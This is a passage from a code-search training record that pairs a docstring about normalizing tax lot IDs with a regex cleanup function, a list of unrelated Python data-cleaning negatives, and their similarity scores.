dict_ord = self.MIN_VALID\n\n for da in self.train_das:\n for dai in da:\n if dai.name not in self.dict_slot:\n self.dict_slot[dai.name] = dict_ord\n dict_ord += 1\n if dai.value not in self.dict_value:\n self.dict_value[dai.value] = dict_ord\n dict_ord += 1\n\n for tree in self.train_trees:\n for t_lemma, formeme in tree.nodes:\n if t_lemma not in self.dict_t_lemma:\n self.dict_t_lemma[t_lemma] = dict_ord\n dict_ord += 1\n if formeme not in self.dict_formeme:\n self.dict_formeme[formeme] = dict_ord\n dict_ord += 1\n\n self.dict_size = dict_ord", "def fill_dict(lineage_data_dict, i, barcode_list):\n # base case\n if i == 5:\n for barcode in barcode_list:\n lineage_data_dict['barcode'].append(barcode)\n return lineage_data_dict\n\n # iterative case\n else:\n barcode_allocation_list = [[] for istate in range(3)]\n for barcode in barcode_list:\n # assign barcodes based on their states and put them into the list\n barcode_allocation_list[barcode['assigned_state'][i]].append(barcode)\n # add these barcodes to the node\n lineage_data_dict['t{}'.format(i)]['barcode'].append(barcode)\n\n # continue to call function for the next timepoint using recursion\n for index, state in enumerate(states):\n lineage_data_dict['t{}'.format(i)][state] = fill_dict(lineage_data_dict['t{}'.format(i)][state], i + 1,\n barcode_allocation_list[index])\n return lineage_data_dict", "def initoptionsdict(cls):\n for i in range(len(clslist)):\n optionsdict.update(dict({clslist[i]: dict({'OPTIONS': dict()})}))", "def setKeys():\n keywords['c++'] = {}\n with open('cppkeywords.txt', 'r') as f:\n for i in f:\n i = i.strip('\\n')\n words = map(str, i.split())\n key = words[0]\n words.pop(0)\n keywords['c++'][key] = list(words)\n for j in words:\n MyDict.insert(j)\n keywords['py'] = {}\n with open('pykeywords.txt', 'r') as f:\n for i in f:\n i = i.strip('\\n')\n words = map(str, i.split())\n key = words[0]\n words.pop(0)\n keywords['py'][key] = list(words)\n for j in words:\n MyDict.insert(j)", "def main_dictionary():\n for lyric in lyrics:\n for line in lyric.split(\"\\n\"):\n dictionary(line.split(\" \"))", "def pre_process_raw(raw: dict) -> dict:\n api_data = raw.get(\"data\", {}).get(\"apiList\", [])\n return {api[\"id\"]: api for api in api_data}", "def convert_list_by_key(\n original_list, key_map, fill_in=False, whitelist=[], blacklist=[]\n): # pylint: disable=dangerous-default-value\n converted_list = []\n for original in list(original_list):\n converted_list.append(\n convert_dict_by_key(original, key_map, fill_in=fill_in, whitelist=whitelist, blacklist=blacklist)\n )\n\n return converted_list", "def organize_results(result_dicts_list, config_fn):\n\n metric_id = config_fn.get_metric_fn_id()[1]\n organized_results = []\n for results_list in result_dicts_list:\n for result_dict in results_list:\n dict_ = {}\n for key, value in result_dict.items():\n dict_[key] = value\n organized_results.append(dict_)\n pass\n\n return organized_results" ]
[ "0.5770778", "0.5673443", "0.5617882", "0.5580341", "0.55801505", "0.5575327", "0.5571679", "0.55587304", "0.5528891", "0.5508562", "0.55064344", "0.5500273", "0.5479882", "0.5471181", "0.5468983", "0.546297", "0.54368216", "0.54329467", "0.5403189", "0.5389576", "0.5385095", "0.5378219", "0.5373672", "0.5370488", "0.5361372", "0.5358726", "0.5351396", "0.532728", "0.5318948", "0.5303318", "0.5294323", "0.52893794", "0.5276036", "0.52743155", "0.52524006", "0.5251311", "0.52474874", "0.52467895", "0.52443683", "0.5240685", "0.52240723", "0.52064145", "0.51972604", "0.5179249", "0.51788646", "0.51752657", "0.516531", "0.51608974", "0.5156805", "0.51469713", "0.51386017", "0.5124779", "0.5106023", "0.51059556", "0.50979054", "0.5086443", "0.50828093", "0.5081", "0.50789464", "0.5075126", "0.5073012", "0.507081", "0.50697875", "0.50668603", "0.5058342", "0.5054118", "0.5046318", "0.50416446", "0.50416094", "0.50387895", "0.5024253", "0.5024253", "0.5022959", "0.5019978", "0.5019158", "0.5016597", "0.5016447", "0.5013971", "0.50128764", "0.5003668", "0.5002569", "0.4999573", "0.49981037", "0.49954066", "0.49872577", "0.49841636", "0.49836805", "0.49809417", "0.49794337", "0.4978328", "0.4978088", "0.4974214", "0.49692562", "0.49552864", "0.49528095", "0.4951847", "0.49505663", "0.49504843", "0.49498627", "0.49403754", "0.4935286" ]
0.0
-1
Fields that are expanded (typically tax lot id) are also in need of normalization to remove characters that prevent easy matching. This method will remove unwanted characters from the jurisdiction tax lot id. Here are some examples of what actual city taxlots can look like 13153123902 069180102923 14A612 123.4123 PANL1593005 0.000099 00012312 12123121212134567 12 0123 TT0612
def _normalize_expanded_field(value): value = value.strip() value = re.sub(r'\s{2,}', ' ', value) value = re.sub(r'/{2,}', '/', value) value = re.sub(r'\\{2,}', '\\\\', value) value = re.sub(r'-{2,}', '-', value) value = re.sub(r'\*{2,}', '*', value) value = re.sub(r'\.{2,}', '.', value) value = value.upper() return value
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tidy_telephone(telephone):\n junk = ['none', 'none1', 'na', 'n/a', 'same', 'yes', 'cell', 'offsite']\n telephone = telephone.replace('xxx-xxx-xxxx', '')\n telephone = telephone.replace('ext', ' x')\n telephone = telephone.replace(' cell', '')\n telephone = telephone.replace('\"', '')\n telephone = telephone.replace('%', '')\n if telephone in junk:\n return ''\n else:\n return telephone", "def scrub_gene_id(the_id):\n the_id = re.sub(r'(.*)\\.([0-9]{1,2})$', r'\\1_AT\\2', the_id)\n the_id = re.sub(r'\\W', r'_', the_id)\n return the_id", "def _clean_id(self, dirty_id):\n return self.wsid_regex.sub(\"\", dirty_id.replace(\" \", \"_\"))", "def minimalTextCleaning(row, field):\n\n # force encoding\n encoded_text = row[field].encode(encoding = 'ascii',errors = 'replace')\n decoded_text = encoded_text.decode(encoding='ascii',errors='strict')\n remove_funky_chars = str(decoded_text).replace(\"?\", \" \")\n lower_case = str(remove_funky_chars).lower().strip()\n\n # strip redundant whitespace\n cleaned_text = re.sub(' +', ' ', lower_case)\n\n\n # strip signature lines\n cleaned_text = cleaned_text.replace(\"_\", \"\")\n\n return cleaned_text", "def normalize(phone):\n d = re.sub('\\D', '', phone)\n return '+7 (%s) %s-%s-%s' % (d[1:4], d[4:7], d[7:9], d[9:11])", "def strip(phone):\n return re.sub('\\D', '', Phone.normalize(phone))", "def clean_fields(self, *args, **kwargs):\n if self.ipi_name:\n self.ipi_name = self.ipi_name.zfill(11)\n if self.ipi_base:\n self.ipi_base = self.ipi_base.replace(\".\", \"\").upper()\n self.ipi_base = re.sub(\n r\"(I).?(\\d{9}).?(\\d)\", r\"\\1-\\2-\\3\", self.ipi_base\n )\n return super().clean_fields(*args, **kwargs)", "def clean_phone(self):\n data = self.cleaned_data['phone']\n data = data.strip(' +').replace('-', '')\n if len(data) == 12:\n data = data[3:]\n\n return data", "def sanitize_id (self, id):\n return re.sub (self.sanitize_pat, '', id)", "def cleanSents(row, field):\n\n text = str(row[field]).lower()\n clean_text = re.sub('[^A-Za-z0-9]+', ' ', text).strip()\n return clean_text", "def clean_as_smiles(self):\n regexp = r\"^([^J][0-9BCOHNSOPIFKcons@+\\-\\[\\]\\(\\)\\\\\\/%=#$,.~&!|Si|Se|Br|Mg|Na|Cl|Al]{3,})$\"\n found = re.search(regexp, self.dirty)\n if found is None:\n self.cleaned = \"\"\n else:\n self.cleaned = found[0]", "def clean_number_plate(self, vrn):\n cleaned = re.sub(r'[^\\dA-Z]', '', vrn)\n\n if re.match(r'^[A-Z]{2}', cleaned) and len(cleaned) == 7:\n if cleaned[2] == 'O':\n cleaned = cleaned[:2] + '0' + cleaned[3:]\n if cleaned[2] == 'I':\n cleaned = cleaned[:2] + '1' + cleaned[3:]\n if cleaned[3] == 'O':\n cleaned = cleaned[:3] + '0' + cleaned[4:]\n if cleaned[3] == 'I':\n cleaned = cleaned[:3] + '1' + cleaned[4:]\n\n if re.match(r'^B', cleaned) and len(cleaned) == 7:\n if cleaned[1] == 'O':\n cleaned = cleaned[:1] + '0' + cleaned[2:]\n if cleaned[1] == 'I':\n cleaned = cleaned[:1] + '1' + cleaned[2:]\n if cleaned[2] == 'O':\n cleaned = cleaned[:2] + '0' + cleaned[3:]\n if cleaned[2] == 'I':\n cleaned = cleaned[:2] + '1' + cleaned[3:]\n if cleaned[3] == 'O':\n cleaned = cleaned[:3] + '0' + cleaned[4:]\n if cleaned[3] == 'I':\n cleaned = cleaned[:3] + '1' + cleaned[4:]\n\n if re.match(r'^[A-Z]{2}', cleaned) and len(cleaned) == 8:\n if cleaned[0] == 'Y':\n cleaned = 'V' + cleaned[1:]\n if cleaned[1] == 'Y':\n cleaned = cleaned[0] + 'V' + cleaned[2:]\n\n return cleaned", "def clean_num(quote):\n for char in ROMAN:\n quote = quote.replace(*char)\n return quote", "def _remove_area_code(phone):\n\n if not phone.startswith('+46'):\n return phone\n else:\n return '0' + phone[3:]", "def clean_as_inchikey(self):\n regexp = r\"[A-Z]{14}-[A-Z]{10}-[A-Z]\"\n found = re.search(regexp, self.dirty)\n if found is None:\n self.cleaned = \"\"\n else:\n self.cleaned = found[0]", "def clean_specific_name(x: str) -> str:\n\n # this is a list of terms that are not actual species names or specific names that have never been part of\n # a fiddler genus\n skip_list = (\"sp.\",\n \"spp.\",\n \"var.\",\n \"nov.\",\n \"a\",\n \"ete\",\n \"panema\",\n \"pagurus\",\n \"quadratus\",\n \"albidus\",\n \"vociferans\",\n \"raniformis\",\n \"nigra\",\n \"albicans\",\n \"arenarius\",\n \"raninus\",\n \"serratus\",\n \"cordimana\",\n \"spec.\",\n \"complex\",\n \"5\",\n \"6\",\n \"1\",\n \"afruca\",\n \"gelasimus\")\n\n if (\" \" not in x) or (\"(\" in x):\n return \"\"\n else:\n if \"{\" in x:\n x = x[:x.find(\"{\")-1]\n y = x.split(\" \")\n x = y[len(y)-1].lower()\n if (x in skip_list) or (\"gruppe\" in x) or (\"group\" in x) or (\"complex\" in x):\n return \"\"\n else:\n return x.lower()", "def normalise_tag_id(input_id):\n return input_id.replace(\" \", \"\").replace(\"\\n\", \"\").replace(\"\\r\", \"\")", "def clean_phone(number):\n numberlist = re.findall(\"\\d\",number)\n new_number = \"\".join(numberlist)\n if len(new_number) == 8:\n \tnew_number = \"010\" + new_number\n\tnew_number = new_number[-11:]\n\tif new_number.startswith('1'):\n\t\tnew_number = \"+86-\" + new_number\n\telse:\n\t\tnew_number = \"+86-10-\" + new_number[-8:]\n\treturn new_number", "def clean_phone(self):\n phone = self.cleaned_data['phone']\n if phone.startswith('8') and len(phone) > 7:\n return phone.replace('8', '+7', 1)\n\n return phone", "def _canonify(self, rut):\n rut = smart_unicode(rut).replace(' ', '').replace('.', '').replace('-', '')\n return rut[:-1], rut[-1]", "def sanitaze(field):\n return re.sub('[^0-9a-zA-Z]+', '-', str(field))", "def cleaning (data):", "def clean_street(self):\n street = self.cleaned_data['street'].strip().title()\n street = re.sub(r'\\bRoad\\b', 'Rd', street)\n street = re.sub(r'\\bStreet\\b', 'Str', street)\n street = re.sub(r'\\bAvenue\\b', 'Ave', street)\n street = re.sub(r'\\bParkway\\b', 'Pkwy', street)\n street = re.sub(r'\\bSuite\\b', 'Ste', street)\n street = re.sub(r'\\bApartment\\b', 'Apt', street)\n street = re.sub(r'\\s+', ' ', street) # Remove runs of spaces\n return street", "def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet", "def remove_numbers_fun(self):\n self.doc = re.sub(\"[0-9]\", \"\", self.doc)", "def normalize_orcid(val):\n for orcid_url in orcid_urls:\n if val.startswith(orcid_url):\n val = val[len(orcid_url) :]\n break\n val = val.replace(\"-\", \"\").replace(\" \", \"\")\n\n return \"-\".join([val[0:4], val[4:8], val[8:12], val[12:16]])", "def remove_phone(body):\r\n phone = re.compile('[0-9]{7}|[0-9]{3}[\\- ][0-9]{3}[\\- ][0-9]{4}|[0-9]{10}|\\([0-9]{3}\\)[\\- ][0-9]{3}[\\- ][0-9]{4}')\r\n body = re.sub(phone, 'phone', body)\r\n return body", "def clean_rent(self, rent):\n # assume rent is either int/float or str\n if isinstance(rent, str):\n return int(rent.replace('$', '').replace(',', ''))\n else:\n return rent", "def clean_weather(weather):\n\n weather.replace(\"M\", float(\"NaN\"), inplace=True)\n weather.replace(\"-\", float(\"NaN\"), inplace=True)\n weather.replace(\"T\", float(\"NaN\"), inplace=True)\n weather.replace(\" T\", float(\"NaN\"), inplace=True)\n weather.replace(\" T\", float(\"NaN\"), inplace=True)\n weather.drop(\"CodeSum\", axis=1, inplace=True)\n\n return merge_weather(weather)", "def _sanitize_to_identifer(name):\n n = name.strip()\n n = re.sub('/', ' ', n)\n n = re.sub('-', ' ', n)\n n = re.sub(' +', '_', n)\n n = re.sub('[\\W]+', '', n)\n return n", "def cleanup_input(data):\n data = re.sub(r'[^0-9A-Za-z ()_,.-:]', '', data)\n return data", "def normalise_key(self, key):\n key = key.replace('-', '_')\n if key.startswith(\"noy_\"):\n key = key[4:]\n return key", "def clean_term(term, site='', siteWordCount=None, dataType=''): # dtype\n if pd.isna(term): \n print(\"(clean_term) Input term is NaN: {}\".format(term))\n return ''\n if not isinstance(term, str): \n return str(term)\n\n insigWords = LoincTable.stop_words # [\"IN\", \"FROM\", \"ON\", \"OR\", \"OF\", \"BY\", \"AND\", \"&\", \"TO\", \"BY\", \"\", \" \"]\n \n modTerm = (term.replace(\"'\", \"\").replace(\",\", \" \").replace(\".\", \" \") \\\n .replace(\":\", \" \").replace('\\t', \" \").replace(\"^\", \" \").replace(\"+\", \" \")\\\n .replace(\"*\", \" \").replace(\"~\", \" \").replace(\"(\", \" \").replace(\")\", \" \")\\\n .replace(\"!\", \" \").replace(\"[\", \" \").replace(\"]\", \" \").replace(\"{\", \" \").replace(\"}\", \" \")\\\n .replace(\"_\", \" \").replace(\"|\", \" \").replace('\"', \" \").split(\" \"))\n\n #############################################################################\n i = 0\n while i < len(modTerm):\n modTerm[i] = re.sub(r\"\\d{1,2}[\\/-]\\d{1,4}([\\/-]\\d{2,4})*|\\d{6}\", \"\", modTerm[i])\n if modTerm[i] != None and len(modTerm[i]) > 0:\n i = i + 1\n else:\n modTerm.remove(modTerm[i])\n #############################################################################\n\n # remove repeated tokens \n modTerm = sorted(set(modTerm), key=modTerm.index)\n\n j = 0\n nameSplit = list()\n while j < len(modTerm):\n splits = modTerm[j].replace(\"/\", \" \").replace(\"\\\\\", \" \").replace(\"-\", \" \").split(\" \")\n k = 0\n while ((k < len(splits)) and (len(splits[k]) > 0) and (splits[k] not in insigWords)):\n newWord = splits[k].strip()\n nameSplit.append(newWord)\n\n if len(site) > 0 and isinstance(siteWordCount, dict): \n siteWordCount[site][newWord] += 1\n k = k + 1\n j = j + 1\n\n return \" \".join(nameSplit)", "def clean_as_inchi(self):\n regexp = r\"(1S\\/|1\\/)[0-9, A-Z, a-z,\\.]{2,}\\/(c|h)[0-9].*$\"\n found = re.search(regexp, self.dirty)\n if found is None:\n self.cleaned = \"\"\n else:\n self.cleaned = \"InChI=\" + found[0].replace('\"', \"\")", "def preprocess_libcom(libcom):\n return tools.normalize_string(re.sub(r'[0-9]+', '', libcom))", "def clean_sunetid1(self):\n return self.instance.sunetid1", "def remove_flight_numbers(text):\n return ' '.join(word for word in text.split() if not any(char.isdigit() for char in word))", "def clean_numbers(self, x):\n\n # remove \"th\" after a number\n matches = re.findall(r'\\b\\d+\\s*th\\b', x)\n if len(matches) != 0:\n x = re.sub(r'\\s*th\\b', \" \", x)\n\n # remove \"rd\" after a number\n matches = re.findall(r'\\b\\d+\\s*rd\\b', x)\n if len(matches) != 0:\n x = re.sub(r'\\s*rd\\b', \" \", x)\n\n # remove \"st\" after a number\n matches = re.findall(r'\\b\\d+\\s*st\\b', x)\n if len(matches) != 0:\n x = re.sub(r'\\s*st\\b', \" \", x)\n\n # remove \"nd\" after a number\n matches = re.findall(r'\\b\\d+\\s*nd\\b', x)\n if len(matches) != 0:\n x = re.sub(r'\\s*nd\\b', \" \", x)\n\n # replace standalone numbers higher than 10 by #\n # this function does not touch numbers linked to words like \"G-20\"\n matches = re.findall(r'^\\d+\\s+|\\s+\\d+\\s+|\\s+\\d+$', x)\n if len(matches) != 0:\n x = re.sub('^[0-9]{5,}\\s+|\\s+[0-9]{5,}\\s+|\\s+[0-9]{5,}$', ' ##### ', x)\n x = re.sub('^[0-9]{4}\\s+|\\s+[0-9]{4}\\s+|\\s+[0-9]{4}$', ' #### ', x)\n x = re.sub('^[0-9]{3}\\s+|\\s+[0-9]{3}\\s+|\\s+[0-9]{3}$', ' ### ', x)\n x = re.sub('^[0-9]{2}\\s+|\\s+[0-9]{2}\\s+|\\s+[0-9]{2}$', ' ## ', x)\n # we do include the range from 1 to 10 as all word-vectors include them\n # x = re.sub('[0-9]{1}', '#', x)\n\n return x", "def normalize_latin(raw_word):\n nfkd = unicodedata.normalize('NFKD', raw_word)\n lowercased = nfkd.lower()\n no_digits = DIGITS.sub('', lowercased)\n j_to_i = re.sub('j', 'i', no_digits)\n v_to_u = re.sub('v', 'u', j_to_i)\n return NONWORDS.sub('', v_to_u)", "def clean_phone(number_str):\n number_str = number_str or ''\n number_str = number_str.replace('(', '').replace(')', '')\n number_str = number_str.replace('ext. ', 'x').replace('ext ', 'x')\n number_str = number_str.split(',')[0].strip()\n\n if number_str:\n return number_str", "def clean(line):\n line = line.strip('\\n').strip()\n line = line.replace('\\xe2\\x80\\x93', '-')\n line = line.replace('\\xe2\\x80\\x99', '\\'')\n\n return line", "def sanitize_record_id(record):\n record.id = READ_INDEX_DIR_RE.sub(\"\", DUP_COLON_RE.sub(r\":\", record.id))", "def clean_line(line, normNum=True, normProf=True):\n\n # Remove square brackets, ceiling characters, question marks, other\n # questionable characters, and line breaks\n line = re.sub(r'(\\[|\\])', '', line)\n line = re.sub(r'(⌈|⌉)', '', line)\n line = re.sub(r'( / )', ' ', line)\n line = re.sub(r'/', '', line)\n line = re.sub(r'\\?', '', line)\n line = re.sub(r'([<]|[>])+', '', line)\n line = re.sub(r'!', '', line)\n line = re.sub(r'\"', '', line)\n\n # Remove researcher's notes, and multiple dashes or '='s\n line = re.sub(r'(\\(.*\\))', '', line)\n line = re.sub(r'(#[.]*)', '', line)\n line = re.sub(r'[-]{2}', '', line)\n line = re.sub(r'[=]{2}', '', line)\n\n # Replace numbers with 'number'\n if normNum is True:\n line = re.sub(r'\\b(?<!-)(\\d+)(?![\\w-])', 'number', line)\n line = re.sub(r'[-+]?\\b\\d+\\b', 'number', line)\n\n #line = re.sub(r'\\b([\\-\\.0-9]+)(?![\\w-])', 'number', line)\n\n # Replace professions with 'profession'\n if normProf is True:\n line = professions.replaceProfessions(line)\n\n # Remove blank character at end of line\n linelength = len(line)\n if (linelength > 0 and line[linelength-1] == \"\"):\n del line[0:linelength-2]\n\n return line", "def shorten_id(id):\n if id.startswith('CN'):\n id = id[2:]\n if not id[-1].isdigit():\n id = id[:-1]\n return id", "def clean_mysteries(self, item):\n if \"[???]\" in item['name']:\n item['name'] = item['name'][6:]", "def normalize(self):\n normalized = self.all_details.get('normalized', '')\n if normalized:\n return normalized\n\n if self.is_digit():\n self.all_details['normalized'] = 'Numeric'\n elif self.is_uuid():\n self.all_details['normalized'] = 'UUID'\n elif self.is_gibberish():\n self.all_details['normalized'] = 'Gibberish'\n else:\n for nr in self.normalized_regex_list:\n regex = nr['regex']\n groups = r'{}'.format(nr['groups'])\n ua = regex.sub(groups, self.user_agent)\n if ua != self.user_agent:\n self.all_details['normalized'] = ua\n break\n else:\n self.all_details['normalized'] = ''\n\n return self.all_details['normalized']", "def clean_abbreviations(x):\n # a few entries in Revenue were nan\n if pd.isnull(x):\n return np.nan\n elif 'K' in x:\n return int(float(x[:-1]) * 1e3)\n elif 'M' in x:\n return int(float(x[:-1]) * 1e6)\n elif 'B' in x:\n return int(float(x[:-1]) * 1e9)\n else:\n return int(x)", "def compact(number):\n number = clean(number, ' ').upper().strip()\n if number.startswith('AL'):\n number = number[2:]\n if number.startswith('(AL)'):\n number = number[4:]\n return number", "def sanitize_input(term: str) -> str:\n return term.strip().replace(\"*\", \"\").replace(\"'\", \"\\\\'\").replace(\"~\", \"\")", "def clean_address(self, s):\n # The letter \"O\" instead of the numeral \"0\" is a common mistake.\n s = re.sub(\n r\"\\b[A-Z][O0-9][A-Z]\\s?[O0-9][A-Z][O0-9]\\b\", lambda x: x.group(0).replace(\"O\", \"0\"), clean_string(s)\n )\n for k, v in province_or_territory_abbreviations().items():\n # Replace a province/territory name with its abbreviation.\n s = re.sub(\n r\"[,\\n ]+\"\n r\"\\(?\" + k + r\"\\)?\"\n r\"(?=(?:[,\\n ]+Canada)?(?:[,\\n ]+[A-Z][0-9][A-Z]\\s?[0-9][A-Z][0-9])?\\Z)\",\n \" \" + v,\n s,\n )\n # Add spaces between province/territory abbreviation, FSA and LDU and remove \"Canada\".\n return re.sub(\n r\"[,\\n ]+\" r\"([A-Z]{2})\" r\"(?:[,\\n ]+Canada)?\" r\"[,\\n ]+([A-Z][0-9][A-Z])\\s?([0-9][A-Z][0-9])\" r\"\\Z\",\n r\" \\1 \\2 \\3\",\n s,\n )", "def strip(self):\n self.document_type = self.document_type.strip()\n self.document_reg_id = self.document_reg_id.strip()\n self.owner_cross_reference = self.owner_cross_reference.strip()\n self.routing_slip_number = self.routing_slip_number.strip()\n self.bcol_account = self.bcol_account.strip()\n self.dat_number = self.dat_number.strip()\n self.examiner_id = self.examiner_id.strip()\n self.update_id = self.update_id.strip()\n self.phone_number = self.phone_number.strip()\n self.attention_reference = self.attention_reference.strip()\n self.name = self.name.strip()\n self.legacy_address = self.legacy_address.strip()\n self.consideration_value = self.consideration_value.strip()\n self.affirm_by_name = self.affirm_by_name.strip()\n self.liens_with_consent = self.liens_with_consent.strip()\n self.client_reference_id = self.client_reference_id.strip()\n self.own_land = self.own_land.strip()", "def clean_data(data):\n \n cols = data.columns\n \n #these columns had some extra characters in the strings becuase of encoding issues\n list_to_strip=[\n 'attributes_alcohol',\n 'attributes_restaurantsattire',\n 'attributes_wifi',\n 'attributes_smoking',\n 'attributes_noiselevel',\n ]\n #this removes quotation marks and u's from strings\n \n for col in list_to_strip:\n data[col]=data[col].str.strip(\"u\\'\")\n \n #this replaces the strings None and none with Nan objects\n for col in cols:\n data[col]=data[col].where(data[col]!='None')\n data[col]=data[col].where(data[col]!='none')\n \n #this creates a list of categorical and numerical features\n categorical_features = cols.drop([\n 'review_count',\n 'restaurant',\n 'latitude',\n 'longitude',\n 'business_id',\n 'meanfunny',\n 'meanuseful',\n 'avgwordcount',\n 'maxwordcount',\n 'minwordcount',\n 'avgfunnywordcount',\n 'maxfunnywordcount',\n 'avgusefulwordcount',\n 'maxusefulwordcount',\n 'medianwordcount',\n 'upperquartilewordcount',\n 'lowerquartilewordcount',\n 'target'])\n \n \n numerical_features = [\n 'review_count',\n 'latitude',\n 'longitude',\n 'meanfunny',\n 'meanuseful',\n 'avgwordcount',\n 'maxwordcount',\n 'minwordcount',\n 'avgfunnywordcount',\n 'maxfunnywordcount',\n 'avgusefulwordcount',\n 'maxusefulwordcount',\n 'medianwordcount',\n 'upperquartilewordcount',\n 'lowerquartilewordcount']\n \n #this replaces the categorial nans with 9 as a placeholder and fills numerical nans with 0\n data[categorical_features]=data[categorical_features].fillna(9)\n data[numerical_features]=data[numerical_features].fillna(0)\n \n #this makes all the categorical columns strings\n data[categorical_features]=data[categorical_features].astype(str)\n data = data\n \n return data, numerical_features, categorical_features", "def extract_valid_species_name(self, taxon):\n\n if ' bacterium' in taxon.lower() or 'sp.' in taxon.lower():\n return None\n\n taxon = taxon.replace('s__', '')\n taxon = taxon.replace('Candidatus', '')\n taxon = taxon.replace('candidatus', '')\n\n if not taxon or taxon[0].islower():\n return None\n\n taxon_split = taxon.split(' ')\n if len(taxon_split) < 2:\n return None\n\n # sanity check\n taxon = 's__' + ' '.join(taxon_split[0:2])\n self.validate_species_name(taxon)\n\n return taxon", "def clean_identifier(self, identifier):\n if isinstance(identifier, list):\n return '%2F'.join(identifier)\n else:\n return identifier", "def __cleanText(self,stripNonAlphaNumeric=False, stripNumbers=False):\n if stripNonAlphaNumeric:\n txt = r1.sub(\" \",self.getRawText() )\n else:\n txt = self.getRawText()\n # clean up white spaces\n txt = r2.sub(\" \",txt)\n if stripNumbers:\n txt = r3.sub(\"\",txt)\n self.graph[\"__txt\"] = txt\n self.graph[\"__scope\"] = (0,len(txt))", "def remove_bad_characters(self):\n\n self.categorie_name = self.categorie_name.replace(\"\\n\", \"\")", "def sanitize_ean13(ean13):\n if not ean13:\n return \"0000000000000\"\n ean13 = re.sub(\"[A-Za-z]\",\"0\",ean13);\n ean13 = re.sub(\"[^0-9]\",\"\",ean13);\n ean13 = ean13[:13]\n if len(ean13) < 13:\n ean13 = ean13 + '0' * (13-len(ean13))\n return ean13[:-1] + str(ean_checksum(ean13))", "def _clean_non_alphanumeric_chars(self):\n\n for i,variable in enumerate(self.model_description.modelVariables):\n clean_name = re.sub(r'[^a-zA-Z0-9_]', '', variable.name)\n if clean_name != variable.name:\n log = \"Sim variable '{}' has been renamed to '{}' \".format(variable.name, clean_name)\n log += \"to comply with Bonsai naming requirements.\"\n print(log)\n self.model_description.modelVariables[i].name = clean_name\n\n return", "def clean_text_from_geometrical_shape_unicode(line):\n line = re.sub(r\"([\\u25A0-\\u25FF])\", \" \", line)\n return line", "def clean_text_from_geometrical_shape_unicode(line):\n line = re.sub(r\"([\\u25A0-\\u25FF])\", \" \", line)\n return line", "def clean_venue(venue):\n\n return venue.lower().strip('?:!.,;- ')", "def tweet_clean_numbers(word):\n if not re.search(r'[0-9]+', word):\n return word\n if len(word)==4 and re.search(r'[0-9]{4}', word) and 1900 < int(word) < 2019:\n return word\n word = re.sub(r'^([0-9]|[\\+\\-%/\\*\\.:])+[0-9%/\\+\\*\\.x:]*$', '<number>', word)\n return word", "def normalizeSerial(serial):\n\treturn serial.upper().replace(\"-\", \"\").strip()", "def clean_weather_df(weather_df):\n col = weather_df.columns\n drop_col = list(col[7::2])\n clean_num = weather_df[weather_df['LATITUDE'].str.contains(\n \"LATITUDE\") == False]\n num_weather = clean_num.drop(drop_col, axis=1)\n just_num = num_weather.drop(['NAME', 'STATION'], axis=1)\n all_weatherdf = just_num.apply(pd.to_numeric)\n all_weatherdf['name'] = num_weather['NAME']\n return all_weatherdf", "def clean_ys(y):\n\n for i, chord in enumerate(y):\n if not len(chord) == 1:\n chord = chord.split(':')\n tonality = re.sub(r'[0-9/]+', '', chord[0])\n flavor = chord[-1]\n if \"min\" in flavor:\n y[i] = tonality + ' min'\n else:\n y[i] = tonality\n return y", "def clean_rn(rn):\n\treturn rn.strip().replace('\\n', '').replace('\\r', '').strip()", "def remove_prep_from_obj(objt):\n objt['initial_value'] = \" \".join(objt['initial_value'].split(\" \")[1:])\n objt['replacement_value'] = \" \".join(objt['replacement_value'].split(\" \")[1:])\n return objt", "def removeNumbers(self, words):\n\t\treturn re.sub(r'\\d', '', words)", "def _remove_digits(self, text: str) -> str:\n return re.sub(r\"\\d+\", \" \", str(text))", "def dummy_junction13():\n return 'junction:chr1:176-299:+'", "def normalize(self, s):\n s = normalizing_regexp.sub('_', s)\n if s[0:1] in string.digits:\n s = '_' + s\n return s", "def dummy_junction14():\n return \"junction:chr1:176-324:+\"", "def _entity_skill_id(skill_id):\n skill_id = skill_id[:-1]\n skill_id = skill_id.replace('.', '_')\n skill_id = skill_id.replace('-', '_')\n return skill_id", "def cleanData(rawData):\n\trawData = re.sub(r'R-LRB- \\(', r'R-LRB- -LRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\)', r'R-RRB- -RRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\(', r'R-RRB- -LRB-', rawData)\n\trawData = re.sub(r'-LRB- \\(', r'-LRB- -LRB-', rawData)\n\trawData = re.sub(r'-RRB- \\)', r'-RRB- -RRB-', rawData)\n\trawData = re.sub(r'PU \\(', r'PU -LRB-', rawData)\n\trawData = re.sub(r'PU \\)', r'PU -RRB-', rawData)\n\trawData = re.sub(r':-\\)', r'smileyface', rawData)\n\n\treturn rawData", "def clean_isbn(isbn):\n digits = set(\"0123456789\")\n return [int(x if x in digits else 10) for x in isbn.translate(None, \" -\")]", "def tidy_address(address):\n address = address.lstrip('$,')\n address = address.rstrip('$,')\n address = re.sub(r'\\$US$', '', address)\n return address", "def strip_phone_prefix(self, phone_num):\n # FIXME more accurate check\n if phone_num.startswith('+86'):\n return phone_num.replace('+86', '')\n if len(phone_num) != 11:\n return None\n return phone_num", "def remove_extra_characters(self, text):\n if text:\n parsed_text = text\n parsed_text = parsed_text.replace(\"[\", \"\")\n parsed_text = parsed_text.replace(\"]\", \"\")\n parsed_text = parsed_text.replace(\"{\", \"\")\n parsed_text = parsed_text.replace(\"}\", \"\")\n parsed_text = parsed_text.replace(\"|\", \" \")\n parsed_text = parsed_text.replace(\"-\", \"\")\n parsed_text = parsed_text.replace(\"&nbsp;\", \"\")\n parsed_text = parsed_text.replace(\":'\", \"\")\n parsed_text = parsed_text.replace(\"'\", \"\")\n parsed_text = parsed_text.replace(\"#\", \"\")\n parsed_text = parsed_text.replace(\"':\", \"\")\n parsed_text = parsed_text.replace(\"=\", \"\")\n parsed_text = parsed_text.replace(\"*\", \"\")\n parsed_text = parsed_text.replace(\"/\", \"\")\n parsed_text = parsed_text.replace(\"<--\", \"\")\n parsed_text = parsed_text.replace(\"-->\", \"\")\n parsed_text = parsed_text.replace(\"<!--\", \"\")\n parsed_text = parsed_text.replace(\">\", \"\")\n parsed_text = parsed_text.replace(\"<\", \"\")\n\n parsed_text = parsed_text.replace('__NOTOC__', '')\n\n return parsed_text", "def clean_posiResNums(self) -> None:\n position_copy = 